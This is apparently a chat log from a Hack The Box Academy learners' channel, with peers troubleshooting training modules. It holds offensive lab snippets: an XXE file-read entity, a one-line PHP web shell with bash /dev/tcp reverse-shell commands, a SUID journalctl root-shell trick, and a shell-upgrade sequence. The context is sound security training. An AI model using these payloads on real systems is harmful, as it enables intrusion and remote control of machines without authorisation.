worked thank you, that Burp update has confused things, looks simpler on the screenshots from the module material
vague dust
i am sure there was a better way then systemctl --all list-units --type=se...
did you try condensing it? see what works and what doesnt work?
plush lotus
did you try condensing it? see what works and what doesnt work?
i did not i am having a hard time understanding the man page.
sonic ridge
I need help with the web attacks local file disclosure module. I've tried <!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=connection.php"> I've also tried a few different paths but I can't seem to get the encoded file
fathom pendant
You don't need to specify the .php
sonic ridge
it still doesnt work
fathom pendant
I mean are you calling &company; anywhere?
sonic ridge
yes
marsh thicket
i dont remember reading anything on the theory pages that i can refer to answer this question?
does this mean i should research the answer on the internet ?
sonic ridge
iin the email field
sonic ridge
i verified that xxe vulnerability is there
vague dust
i dont remember reading anything on the theory pages that i can refer to answer ...
nope. you need to find the answer in your terminal.
fathom pendant
i dont remember reading anything on the theory pages that i can refer to answer ...
Nope
There's a command that helps you find __env__ironment variables
marsh thicket
im assuming theres a command that helps with this but none of the theory pages referred to find path to users mail?
vague dust
im assuming theres a command that helps with this but none of the theory pages r...
have you tried checking and seeing what env does?
marsh thicket
ahhh
fathom pendant
have you tried checking and seeing what ```env``` does?
My hint was more subtle
plush lotus
did you try condensing it? see what works and what doesnt work?
what would you have recommended fro the grep
vague dust
My hint was more subtle
yeah i botched that one. sorry
marsh thicket
i dont remember reading anything on the theory pages that i can refer to answer ...
so just for future reference, the answers to all future questions are in the theory provided and i shouldnt ever have to look up on the internet or do further research
right?
vague dust
IF you do look up on the internet dont look up the module look up the METHOD you are trying to do. example: what command do i input in powershell to ignore scripts
im still trying to attack the server in this module to let me get a cert 😿
ripe wadi
how to practice the learned things in academy using free htb machines
like is there a site or somethng from which i can see which topics are for a machine
sonic ridge
i found out what it was, it wasnt formatted correctly
autumn pilot
Rado35 you can use the Academy x HTB Labs feature to find out the knowledge required from modules to solve a certain machine
fathom pendant
how to practice the learned things in academy using free htb machines
The free labs don't have tags. The academy x labs feature only shows retired machines
ripe wadi
The free labs don't have tags. The academy x labs feature only shows retired mac...
guess i will have to buy a subscription to pracitce
or are the free ones good enough
vague dust
guess i will have to buy a subscription to pracitce
if you have a student email they have a student subscription
ripe wadi
if you have a student email they have a student subscription
for boxes too?
i know for academy
vague dust
for boxes too?
its mainly academy from what i saw but you get access to more modules than a free sub
ripe wadi
isnt it only for academy
marsh thicket
have you tried checking and seeing what ```env``` does?
Which shell is specified for the htb-student user?
for this question do i write the path ?
vague dust
what is the question asking you
marsh thicket
which shell is specified ?
fathom pendant
isnt it only for academy
Academy only has a student sub
ripe wadi
yeah
fathom pendant
which shell is specified ?
That can be found in env
vague dust
your going to have to do a little digging for that one. the answer is closer than you think
marsh thicket
i found it in env but it gave a path
fathom pendant
i found it in env but it gave a path
Yeah and?
fathom pendant
Did you try or just assume
ripe wadi
is the vip enough
vague dust
i found it in env but it gave a path
you are going to find out alot of the answers are there without you realizing it.
ripe wadi
is the vip enough
since i wont be taking the exams for the role paths but i wanna do some labs to ssee what i have learned from academy
my only concern is that boxes are too ctf-ish and not really real world
autumn pilot
each machine or challenge tries to teach you something
vague dust
im finally done with that module 
hasty mauve
my only concern is that boxes are too ctf-ish and not really real world
In my experience, i did not come across a single CTF-ish machine in HTB.
ripe wadi
In my experience, i did not come across a single CTF-ish machine in HTB.
thats good since in thm most i di were like that
although i didnt do a lot
hasty mauve
thats good since in thm most i di were like that
Lol yeah i can agree on that, i moved from the platform mainly because of this.
I did around 140 machines on THM, most of them were CTF-ish
autumn gate
in "Pivoting, Tunneling, and Port Forwarding" module "SOCKS5 Tunneling with Chisel" i Building the Chisel Binary and Transferring Chisel Binary to Pivot Host, the chisel binary works in my parrot machine but it doesn't work on ubuntu pivot host. it shows the following error --> ubuntu@WEB01:~$ ./chisel --help
./chisel: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./chisel)
this is the error screen shot for referance
tired sundial
hope all are doing fine
I just wanted some guidance regarding cybersecurity like from where should I start any insights you all wanna share
vague dust
theres a htb bible lying around here somewhere...
fringe timber
HTB Academy obviously :p
compact patrolBOT
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
hasty mauve
in "Pivoting, Tunneling, and Port Forwarding" module "SOCKS5 Tunneling with Chis...
Try Compiling the binary again with -static flag
autumn gate
Try Compiling the binary again with `-static` flag
just now noticed, thank you
steel snow
are you using a vpn?
yes, i am
sick depot
Can anyone help with the bleeding edge vulns module in AD attacks and enum
plush lotus
ok once again i am missing something
vague dust
well it says newline....what would cause it to read as newline?
plush lotus
well it says newline....what would cause it to read as newline?
i am not sure what that even means
vague dust
maybe google the error message?
fathom pendant
i am not sure what that even means
Why are you doing <thing>
< and > are special characters in bash
plush lotus
Why are you doing <thing>
i am trying to combine what ive learned to help in other modules. is that not the correct syntax
vague dust
i think she is hinting at what to type in google
fathom pendant
Sometimes (most times) syntax that's shown with any kind of brackets, you drop the brackets
plush lotus
Why are you doing <thing>
i think i forgot to escape is that correct
plush lotus
Sometimes (most times) syntax that's shown with any kind of brackets, you drop t...
ok how do i drop the brackets
vague dust
🫢
plush lotus
please do i might stick better
fathom pendant
Use your brain to think of what "dropping" can mean
https://tenor.com/view/you-can-lead-a-horse-to-water-stubborn-proverb-not-allowed-risky-gif-15609394
plush lotus
Use your brain to think of what "dropping" can mean
ok i removed the brackets with zero results
vague dust
did you get a new error
plush lotus
did you get a new error
i did not
vague dust
so what does that tell you?
vague dust
why?
vague dust
is there a target at the end of the page?
fathom pendant
because there is no target in the vpn section
Ah you figured out the secret
I was waiting for you to realize
vague dust
lol
plush lotus
Ah you figured out the secret
still no results and no errors
vague dust
🤦♂️
vague dust
heres a hint. are there questions you have to answer at the end of that section?
fathom pendant
Perhaps there's a simpler way to check dconf.service
plush lotus
even using find i get permission denied
vague dust
what section and module is this? i wanna see
plush lotus
task scheduling linux fundamentals @vague dust
sonic ridge
can someone help me with the web attacks blind data exfiltration module? I set up the listener and I don't get a connection when I send the request to /blind/submitDetails.php
fathom pendant
task scheduling linux fundamentals <@1171287186172293212>
sly kelp
Can someone direct me in right direction in Injection Attacks Modules. I'm unable to connect thedots
LDAP- Data exfiktratiom and Blind exploitation. I followed as module says but I couldn't get any ||char|| other than ||*||
plush lotus
@fathom pendant @vague dust
acoustic owl
Can someone direct me in right direction in **Injection** **Attacks Modules**. ...
Are you trying to read out the right data?
sly kelp
Are you trying to read out the right data?
According to my understanding I'm supposed to get use description attributes to get all the chars
plush lotus
@vague dust @fathom pendant
fathom pendant
Tip; you throw the 2> /dev/null on the find command
sly kelp
According to my understanding I'm supposed to get use description attributes to ...
I used burp intruder to get the chars but I'm missing something because I get some different response but size is 0. Like I couldn't figure out the logic for it
fathom pendant
Might just be borked #1234357888114364508
acoustic owl
I used burp intruder to get the chars but I'm missing something because I get so...
First find a payload that works. Only then can you try to read out the characters.
plush lotus
Might just be borked <#1234357888114364508>
i am gonna have to agree with you i guess ill use google to find the anser
fathom pendant
i am gonna have to agree with you i guess ill use google to find the anser
Make a post in #1234357888114364508
vague dust
i had to bust out my VIM cheatsheat lol
sonic ridge
whats the best way to remember all this stuff we learn
fathom pendant
i had to bust out my VIM cheatsheat lol
Imagine needing a cheatsheet for vim
fathom pendant
whats the best way to remember all this stuff we learn
Notes and practice
vague dust
nano ftw
sly kelp
First find a payload that works. Only then can you try to read out the character...
Okay thanks I'm going try it again
acoustic owl
Okay thanks I'm going try it again
Also take a look at the cheatsheet in the module
plush lotus
Make a post in <#1234357888114364508>
done
quasi wave
ok so for the medium lab for Password Attacks module I did an nmap scan and found SMB was a way in. I used crackmapexec to get the username and password for SMB. I am trying to log in with that user via smbclient but its giving me an error. I looked up the error but I am not understanding people's solution on how to solve it. Here is my command:
┌─[us-academy-1]─[10.10.15.85]─[htb-ac-605555@htb-kvcwjpxhxm]─[~]
└──╼ [★]$ smbclient -L 10.129.192.129 -U john
Password for [WORKGROUP\john]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
SHAREDRIVE Disk SHARE-DRIVE
IPC$ IPC IPC Service (skills-medium server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
I am thinking do I need to specify the IPC share?
is that my issue?
fathom pendant
I am thinking do I need to specify the IPC share?
Why do you need the ipc$ share?
quasi wave
Why do you need the ipc$ share?
I need to log in as john
crisp solstice
yeah but how do you practice
Hack the box CTFs and academy, bug bounties, THM etc
quasi wave
but why won't it let me log in?
sonic ridge
do they have ctf for web penetration
fathom pendant
With smb you need to specify the share you're connecting to
You can't just connect to the root
acoustic sparrow
does anyone in here finished winows lateral movment (Winrm)
fathom pendant
do they have ctf for web penetration
Sometimes
acoustic sparrow
does anyone in here finished winows lateral movment (Winrm)
Connect to DC01 as Leonvqz and read the flag located at C:\Users\Leonvqz\Desktop\flag.txt
vague dust
Tip; you throw the 2> /dev/null on the find command
i think i found it.
wooden trail
Hi guys, is it normal that its seems impossible to get a revshell on File Upload path? I get code execution but never a revshell.
File is:
<?php system($_REQUEST['cmd']); ?>
shots taken are:
94.237.54.116:33750/uploads/reverse.php?cmd=bash -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1
94.237.54.116:33750/uploads/reverse.php?cmd=bash -c 'bash -i >& /dev/tcp/xx.xx.xx.xx/9001 0>&1'
Its driving me crazy, no much space for mistakes lol, 1 command
fathom pendant
Hi guys, is it normal that its seems impossible to get a revshell on File Upload...
It's normal
wooden trail
A call like:
94.237.54.116:33750/uploads/reverse.php?cmd=whoami
Works perfectly fine
wooden trail
It's normal
Why is that?
fathom pendant
You're attacking a public ip. Not private
wooden trail
You're attacking a public ip. Not private
oh lord that is true
acoustic owl
As far as I know, Docker containers (Target machines) have no way of contacting anything outside their network
fathom pendant
You'd have to do some port forwarding shenanigans to get a revshell, which isn't recommended
fathom pendant
it's also why it directly gives you a port 😉
wooden trail
it's also why it directly gives you a port 😉
100%, I was hitting my head against a wall without even looking at it
quasi wave
ok for the medium box I cracked the file and logged in as jason
so from here do I need to do credential hunting?
in order to find root password?
fathom pendant
root is the end goal; there may be many steps in between
do take a note of what led you to j*
the documentation mentions something which may be helpful :)
quasi wave
ok
velvet gale
@quasi wave Just so you know, in case you have heard the term but don't know what it means. The processes of going from the user you are ( a lower privilege user) to root (a SYSTEM/kernel level user) is known as "Privilege escalation"
vague stag
guys
velvet gale
The cyber mentor has a very good linux and windows privilege escalation course free on youtube for beginners. It covers most of the basics
vague stag
I read rules
velvet gale
Read welcome as well.
quasi wave
<@459408528818569217> Just so you know, in case you have heard the term but don'...
I knew what it was just not how to do it
fathom pendant
I knew what it was just not how to do it
you don't have to do anything fancy to go up
just follow the path in front of you
quasi wave
I found in the document there is mention of database files so I used the BASH for-loop to list DB files but I don't have permission to read any of them
so can't cat any of them out
fathom pendant
I wonder what DATABASE service can be used
🤔 maybe some sort of __s__tructured__q__uery__l__anguage server 🤔
quasi wave
ok
fathom pendant
gotta abstract some thought sometimes
think of the question for root as Z; so you're not gonna always go directly from a -> z; sometimes you need to go through the alphabet to get to z
again don't assume that the question is telling you the first step
the question is just a goal
quasi wave
ok I'm logged into sql database
fathom pendant
stuff you learned from common services should come in handy; from what i recall that comes before pw attacks
quasi wave
so previous module?
but isn't network services section in the pw attacks module?
or do I look back at footprinting module?
fathom pendant
well take a look at it this way
what are you currently interacting with
and what do you think would be most useful
by what you learned i meant moreso the enumeration portion
quasi wave
ok
steel snow
@urban sage sorry for mentioning you! ban mckinnon
he is a scammer that offers hacking services
real delta
<@523197719167107080> sorry for mentioning you! ban mckinnon
DM a mod
fathom pendant
<@523197719167107080> sorry for mentioning you! ban mckinnon
reach out to mods/admins in dm
if it's related to discord moderation, their dms are open
(alongside providing screenshots)
also be mindful that most mods, i think, are human -- so holiday stuff
urban sage
<@523197719167107080> sorry for mentioning you! ban mckinnon
Dm me a screenshot. 
hybrid bison
Hey is any link how to hack social media
plush lotus
@fathom pendant he sent me a dm asking for help as well
steel snow
i will!
fathom pendant
there's no 2nd host
fathom pendant
rsa keys can be password protected
quasi wave
is that to log into yet a different server?
fathom pendant
nope
quasi wave
is it for the mysql server?
fathom pendant
the one question you should ask; "Why is it password protected"
the mysql server is the target server
so no
fathom pendant
and abstract from "why would an ssh rsa key be password protected"
and the realization should hit you of what to try
there's a logical leap
quasi wave
ok
fathom pendant
like when you go to unzip a protected archive
quasi wave
this is for an archive ya
quasi wave
ok
steel snow
guys... i am facing weird problem. i would spawn a machine, then sometimes the connection dies and i have to respawn the machine and sometimes that doesn't even work as well
fathom pendant
your questions about what to do are revealing spoilers about the skill assessment
compact patrolBOT
quasi wave
your questions about what to do are revealing spoilers about the skill assessmen...
ok sorry
can someone DM me?
or can I DM someone? I don't want to spoil anything but I just want to make sure I can solve this
fathom pendant
can someone DM me?
i'm telling you this: you're on the last step, you just need to make a leap of logic
delicate steeple
Hey all
i am at
Linux Privilege Escalation
Miscellaneous Techniques
Review the NFS server's export list and find a directory holding a flag.
i made shell and compiled it and when i try to run it on the machine it does not do anything i dont get to the root privilege to continue
can someone give a little hint?
quasi wave
ok
strong crag
hi, is anyone able to help with python library hijacking in linux priv esc? feel free to DM
fathom pendant
you won't be able to do everything mentioned
delicate steeple
im sorry marcielee were you talking to me or que?
fathom pendant
im sorry marcielee were you talking to me or que?
the don't need to do that was to you
quasi wave
i'm telling you this: you're on the last step, you just need to make a leap of l...
Ok in that case I’ve written down everything so will try again in a few hours
Just to give my brain a rest
I’ll try again myself soon
delicate steeple
the don't need to do that was to you
aah ty, i did figure it out thank you
past hemlock
Hello, guys, I almost completed my CBBH modules but still stuck on the SERVER SIDE ATTACK Module specifically in INTERNAL PORT SCANNING BLIND SSRF can anyone help me?
plush lotus
$sudo apt install freerdp
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Package freerdp is a virtual package provided by:
freerdp3-x11 3.5.1+dfsg1-5~bpo12+1
freerdp3-shadow-x11 3.5.1+dfsg1-5~bpo12+1
freerdp2-x11 2.10.0+dfsg1-1
freerdp2-shadow-x11 2.10.0+dfsg1-1
You should explicitly select one to install.
E: Package 'freerdp' has no installation candidate
to do the windows fundamentals i need to installl xfreerdp to my parrot os is there one i should get for the module
fathom pendant
$sudo apt install freerdp
Reading package lists... Done
Building dependency tree...
sudo apt install aptitude
sudo aptitude install freerdp2-x11
might be smarter to do freerdp3-x11
but freerdp2 is the previous stable version
yes aptitude is different from apt
plush lotus
but freerdp2 is the previous stable version
i just want what is needed to complete the lesson.
fathom pendant
either one is fine
there's also rdesktop, or remmina
remmina or reminna has a GUI you can use instead of CLI
plush lotus
the course is wanting me to use this package
fathom pendant
i forget the spelling
fathom pendant
the course is wanting me to use this package
it's being showcased because it's the most common rdp tool for linux
plush lotus
ok so your stating it does not matter how i gain remote acces to the target. everything will work fine in the vpn
fathom pendant
yep
rdp is rdp
¯_(ツ)_/¯
but the commands i gave you will install freerdp to be able to use xfreerdp
as stated by the error, part of the issue was you not specifying which freerdp you're referring to
dim ridge
@vague dust that lucky.php was fiddly but not too bad
vague dust
Lol the RNG gods smiled upon you
dim ridge
haha had to repeat it loads of times but got it eventually
plush lotus
as stated by the error, part of the issue was you not specifying *which* freerdp...
correct just didnt know if there were differnces in rdp
fathom pendant
correct just didnt know if there were differnces in rdp
it's not a difference in rdp
it's a difference in package name
you should explicitly select one to install
but freerdp has always had issues installing with apt; so installing aptitude and installing via that tool works fine
cerulean tulip
Hoii
jade fulcrum
can someone help me with the Introduction To Splunk & SPL module?
plush lotus
@fathom pendant its failing i can not rdp into target
fathom pendant
it's failing
very useful
fathom pendant
<@134323136853311488>
you're missing something from the password
plush lotus
i also deleted the vpn download. dowloaded a vpn made a new connection just to make sure
jeez
fathom pendant
also a tip with xfreerdp; /dynamic-resolution and /cert-ignore
dynamic-resolution lets you resize
plush lotus
also a tip with xfreerdp; /dynamic-resolution and /cert-ignore
ok that tip means nothing
fathom pendant
and /cert-ignore well. ignores the cert error you see
vague dust
Wow.
fathom pendant
ok that tip means nothing
it means everything 
sterile moon
guys where to start with chemistry box
fathom pendant
guys where to start with chemistry box
plush lotus
$xfreerdp /v:10.129.26.16 /u:htb-student /p:Academy_winFun!
[08:17:39:506] [44761:44762] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[08:17:39:506] [44761:44762] [ERROR][com.freerdp.core] - failed to connect to 10.129.26.16
@fathom pendant
signal pike
I had the same issues using xfreerdp, I couldnt solve even with the additional options so I just used the website machine
fathom pendant
$xfreerdp /v:10.129.26.16 /u:htb-student /p:Academy_winFun!
[08:17:39:506] [4476...
reset your vm and try reconnecting
plush lotus
its not a vm. its my os
vague dust
This is all over the place lol
fathom pendant
reset your vm and try reconnecting
then just restart your machine
signal pike
I tried solving the errors and I was not getting any results, use the website vm if you can
fathom pendant
¯_(ツ)_/¯
plush lotus
ok i will reboot
fathom pendant
I had the same issues using xfreerdp, I couldnt solve even with the additional o...
i've had very little issues with xfreerdp
also try putting the password in singlequotes (or at least get in the habit of that)
signal pike
I'm having rdp problems in the AD attack modules, never had problems before
but the vm works, so I use the vm
vague dust
I use xfreerdp /u:eagle\htb-student /p:Academy_winFun! /v:10.129.26.16
fathom pendant
I use xfreerdp /u:eagle\\htb-student /p:Academy_winFun! /v:10.129.26.16
you shouldn't need to specify the Domain
vague dust
Oh. Well it's worked for me since lol
left stirrup
hiii
fathom pendant
Oh. Well it's worked for me since lol
as long as the domain is eagle, sure
but there's also other tools like rdesktop and remmina
iirc remmina is installed on parrot by default
if you want to talk about random stuff go to #general <--
vague dust
I use the rdesktop when im logged into the target when it's windows lol
plush lotus
I use the rdesktop when im logged into the target when it's windows lol
ok how do install this one. i am over freerpd
fathom pendant
sudo apt install rdesktop; should be there by default iirc on parrot
plush lotus
no man came up
fathom pendant
plush lotus
thank you
vague dust
I think it's naptime
left stirrup
Hiii,
I've got a problem with the skill assesment of the wi-fi penetration testing basics.
It seems that I'm not capable to see a lot of frames from the access point HTB.
I need to capture the EAPOL to actually crack the passphrase.
Does anyone had an idea of where the problem could came ?
dim ridge
@vague dust how do you get burp to brute force the last character of the cookie AND THEN encode the whole payload again
For the third question on https://academy.hackthebox.com/module/110/section/1055
fathom pendant
<@1171287186172293212> how do you get burp to brute force the last character of ...
add prefix
vague dust
oh lawd i havent done that in a hot minute
fathom pendant
it's in the payload options of intruder
and encoding you just do in reverse of how you decoded
plush lotus
@fathom pendant ok target window opens. then crashes
fathom pendant
decode order: md5 --> b64 --> ascii
encode order: ascii --> b64 --> md5
fathom pendant
<@134323136853311488> ok target window opens. then crashes
i'm not staff or support
compact patrolBOT
plush lotus
i'm not staff or support
ok. youve helped alot thank you
vague dust
I wish you could read the modules on your phone
dim ridge
D: getting errors with burp and ZAP now where it can't find the site, but outside of the apps it can
vague dust
Oh....is it on the web page lol
dim ridge
delays delays hehe
fathom pendant
Oh....is it on the web page lol
in the app settings of your mobile browser
for chrome it's 3 dots then scroll a bit in that menu
vague dust
Ah gotcha. I'll just do that then thank you
fathom pendant
D: getting errors with burp and ZAP now where it can't find the site, but outsid...
i just use foxyproxy instead of the in-app browser
dim ridge
yeah i might do tha tinstead
fathom pendant
Ah gotcha. I'll just do that then thank you
you won't be able to use pwnbox or anything mind you
dim ridge
nice to avoid sending all browser traffic to proxy tho haha
ah its working now, needed a reboot for some reason
vague dust
you won't be able to use pwnbox or anything mind you
I didn't intend to. I'm on the networking module and that requires some reading. Thank you for the heads up
fathom pendant
networking module is basic networking 101 stuff with some light maths involved
dim ridge
its the note taking that slows me down too i think
fathom pendant
slow isn't bad
dim ridge
the AD one is 💀 a lot
dim ridge
true but trying to get CPTS done before the promotion cycle
fathom pendant
¯_(ツ)_/¯
dim ridge
in feb, could mean an extra 30k
fathom pendant
don't beat yourself up if you don't get it
plush lotus
@fathom pendant issue was resolved by full system shutdown. fyi
vague dust
Yeah don't burn yourself up. I did that to myself doing the bug bounty oath
A reset you say?
fathom pendant
<@134323136853311488> issue was resolved by full system shutdown. fyi
iirc that was one of my first suggestions
dim ridge
Thanks got it, prefix then encode twice, i couldn't get my head around putting the wordlist in and putting the original cookie in and then encoding both again
vague dust
fathom pendant
Thanks got it, prefix then encode twice, i couldn't get my head around putting t...
i wasn't giving the exact order
dim ridge
ah ok
fathom pendant
just an example
dim ridge
no worries, thanks again Marcielee
vague dust
But you learned!
vague dust
Did you refresh the page?
signal pike
D: why is my weekly streak showing 0
mine too
fathom pendant
D: why is my weekly streak showing 0
it rolled over to the new week
the timer is set in UTC
dim ridge
so when will it show the real number, it should be around 30
fathom pendant
when you pay me $1000
dim ridge
aha
fathom pendant
likely some backend bug
vague dust
Only 1k?
fathom pendant
results not guaranteed
acoustic light
Does anyone have the built in browser functionality for ZAP working correctly on a Debian based distro? As far as I can tell my selenium, geckodriver and firefox versions are compatible but I keep getting the 'the provided browser was not found error' when i try to launch firefox from ZAP.
acoustic light
unfortunately i have the same issue with chrome as well. starting firefox outside of zap, turning on foxyproxy , etc. works though. This just seems like something that should work considering mozilla sponsors the tool.
rough violet
https://gtfobins.github.io/gtfobins/journalctl/
i can't get this to work
from Permission Management, Linux Fundamentals
"If the administrator sets the SUID bit to "journalctl," any user with access to this application could execute a shell as root. More information about this and other such applications can be found at GTFObins."
fathom pendant
what are you trying to get working?
there's no questions or anything for this section
waxen totem
https://gtfobins.github.io/gtfobins/journalctl/
i can't get this to work
from Pe...
make sure journalctl has the proper (in this case improper) perms
dark hedge
https://gtfobins.github.io/gtfobins/journalctl/
i can't get this to work
from Pe...
SUID bit has to be set on journalctl.
rough violet
what are you trying to get working?
manage to open a shell via journalctl, that's the risk
rough violet
make sure journalctl has the proper (in this case improper) perms
kewl
fathom pendant
manage to open a shell via journalctl, that's the risk
Doesn't mean that risk is gonna exist, especially on the pwnbox
rough violet
SUID bit has to be set on journalctl.
so chmod u+s /usr/bin/journalctl
rough violet
Doesn't mean that risk is gonna exist, especially on the pwnbox
because the suid bit is not set?
fathom pendant
Bingo
rough violet
@waxen totem @dark hedge @fathom pendant didn't work
waxen totem
o wait I'm high
fathom pendant
<@729736193251606629> <@1269870775985377375> <@134323136853311488> didn't work
Just ./journalctl.sh
On your script
rough violet
Just ./journalctl.sh
permission denied
fathom pendant
Does it have the execution bit enabled?
rough violet
no mb
fathom pendant
Also you're misinterpreting what gtfobins is saying
Just run journalctl, then do !/bin/sh
rough violet
Just run journalctl, then do !/bin/sh
i tried that tho
but before i added the s bit
rough violet
doesn't work, I can't write the ! at the start
rough violet
yea there's too much to learn,
i think the problem is i can't open a command
when i write /bin/sh it tried to match with logs
fathom pendant
!/bin/sh one line
In most things ! tells the program to run a local system command instead of internal command
fathom bone
someone here who can help me with last question kerberos Attacks Skill Assessment?
waxen totem
!/bin/sh one line
just tried it, can confirm, it's weird,
fathom pendant
it's unlikely to run into anyway ¯_(ツ)_/¯
slender delta
someone here who can help me with last question kerberos Attacks Skill Assessmen...
You'd need to ask the question first, without any spoiler about the exercise
fathom bone
What's the content of the file: \DC01\Secret Share\flag.txt?
you finished it already?
slender delta
You'll have to find that out....
I haven't done the Kerberos Attacks modules but someone might have
vague dust
cant share answers on the modules folks 🙂
fathom bone
did you finish it?^^
vague dust
finish what? im not up to speed on this channel since it is very active >_>
fathom bone
if someone here can help me out with the Kerberos Attacks Skill Assessment on the last question just hit me up pls 😄
vague dust
what module is it?
slender delta
what module is it?
The Kerberos Attacks module. They want to know the contents of the flag.txt file
vague dust
oooooooh. i dont even have that module unlocked lol
viral patrol
I'm working on the Conditional Execution module for the "Introduction to Bash Scripting" section and I am running into a wall answering the question. I've looked around and I seem to be getting the same answer other people are, but they're also saying it isn't working.
Question: "Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer."
||`#!/bin/bash
Count number of characters in a variable:
echo $variable | wc -c
Variable to encode
var="nef892na9s1p9asn2aJs71nIsm"
for counter in {1..40}
do
var=$(echo $var | base64)
echo -e ${#var}
done`||
Its been a long time since I've done bash coding, so had to knock some rust off. I prefer Python
rough violet
hadnle what? the suspension? how
waxen totem
hadnle what? the suspension? how
You can handle the suspended process afterwards
most common use case for this is when you're spawning an interactive shell:
(kali)$ nc -lvnp 1337
connection from 10.10.10.10
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data$
ctrl+z
(kali)$ stty echo raw; fg
www-data$ export TERM=xterm
ctrl+z suspends the shell so you can change your terminal settings for a better shell experience, fg puts it back into use
jobs to see what's suspended
vague dust
wow im actually interested in this networking module...weird
oak raptor
Hello can someone help me
i tried both and xfreerdp gives a black screen and rdesktop gives that credentials is wrong , also changed the vpn of PWNbox and all the same
xfreerdp /v:<ip> /u:htb-student /p:Academy_student_AD!
rdesktop -u htb-student -p Academy_student_AD! <ip>
vague dust
are there any error messages when you xfreerdp?
oak raptor
are there any error messages when you xfreerdp?
cloud urchin
Hello can someone help me
i tried both and xfreerdp gives a black screen and rde...
in xfreerdp on the black screen press space.
oak raptor
in xfreerdp on the black screen press space.
wow
it worked
i get it that's for the blue screen before login , thank you @vague dust @cloud urchin
grizzled cobalt
I'm having some trouble with my kali VM. It won't resolve an internet connection, and the only thing listed when I run ifconfig is the local host. Anyone have any tips?
brave scroll
I'm having some trouble with my kali VM. It won't resolve an internet connection...
bro, install vmtools again maybe it will help.
grizzled cobalt
Dumb question, but just to clarify: you mean install it onto the host machine right?
cloud urchin
I'm having some trouble with my kali VM. It won't resolve an internet connection...
make sure in your hypervisor you actually gave it a NIC
grizzled cobalt
Mine looks like yours, it's a NAT
brave scroll
Mine looks like yours, it's a NAT
just try to install vmtools again.
brave scroll
Mine looks like yours, it's a NAT
or by going in virtual network editor just click on default setting.
grizzled cobalt
Any ideas how this could have happened? The only changes I've made to the settings were to give it more memory (that was earlier today). Other than that, I haven't changed them for several months.
cloud urchin
gremlins
grizzled cobalt
I have three children. You might actually be more right than you realize.
brave scroll
Module: Pivoting, Tunneling, and Port Forwarding
Section: Remote/Reverse Port Forwarding with SSH
- Have done the SSH with Dynamic port forwarding successfully but when i do Host scan it shows me that all hosts are already up, have tried -Pn or -Ss scans also.
cloud urchin
Module: Pivoting, Tunneling, and Port Forwarding
Section: Remote/Reverse Port...
It's explained in the 'dynamic port forwarding with ssh and socsk tunneling' section
you can only perform full TCP connect scans over proxychains
rustic sage
Hi guys, AD enumeration skill assessment.
I can't get chisel reverse tunnel to get back to my attacker host.
the --reverse flag should do it, but I don't get where the issue lies..
The pivot is the machine on ip 172.16.6.100, and this internal network is on 172.16.6.50
a better overview of whats happening:
tranquil axle
Aren’t you connecting to the .50 machine in the screenshot on the bottom right?
Ping often doesn’t work on windows machines so don’t rely on that
velvet gale
what is the output of /etc/proxychains4.conf the last line say?
should say socks5 127.0.0.1 1080
rustic sage
yeah, says the same
the proxychains connects me to the internal network
so its not the issue I assume
I wasn't able to Invoke-WebRequest too
The pivot (172.16.6.100) is giving my attacker host (10.10.16.6) access to the internal machine(172.16.6.50).
Using the --reverse flag on Chisel should get the internal machine be able to access my attacker host, or am I wrong?
cloud urchin
looks like it's working to me
the pivot grants your host machine access to the private subnet that's normally not accessible to you
brave scroll
It's explained in the 'dynamic port forwarding with ssh and socsk tunneling' sec...
thanks man, i just forget about it
cloud urchin
the end machine can't just connect to your machine, it has no route to your machine